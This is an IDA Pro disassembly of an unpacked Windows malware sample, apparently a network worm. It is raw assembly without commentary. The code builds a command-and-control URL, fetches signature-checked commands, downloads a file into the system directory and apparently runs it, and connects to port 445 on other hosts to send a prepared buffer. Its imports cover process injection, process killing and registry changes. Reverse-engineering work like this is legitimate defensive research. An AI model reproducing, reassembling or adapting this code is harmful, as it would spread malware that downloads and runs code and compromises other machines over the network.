;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 94BE146DCDDCFEDD3680C7E19A854146
; File Name : u:\work\94be146dcddcfedd3680c7e19a854146_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; dword_31421088
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; dword_31421088
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; dword_3142112C
push edi
call esi ; dword_3142112C
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; dword_31421098
push 0
push offset dword_31424FEC
call ebx ; dword_31421098
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; dword_31421094
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
